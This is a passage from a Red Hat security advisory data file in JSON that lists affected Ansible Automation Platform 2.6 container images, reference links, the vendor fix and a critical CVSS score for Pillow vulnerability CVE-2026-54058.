"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "RHBZ#2500057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500057"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54058"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d",
"url": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9719",
"url": "https://github.com/python-pillow/Pillow/pull/9719"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93"
}
],
"release_date": "2026-07-14T16:27:38.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
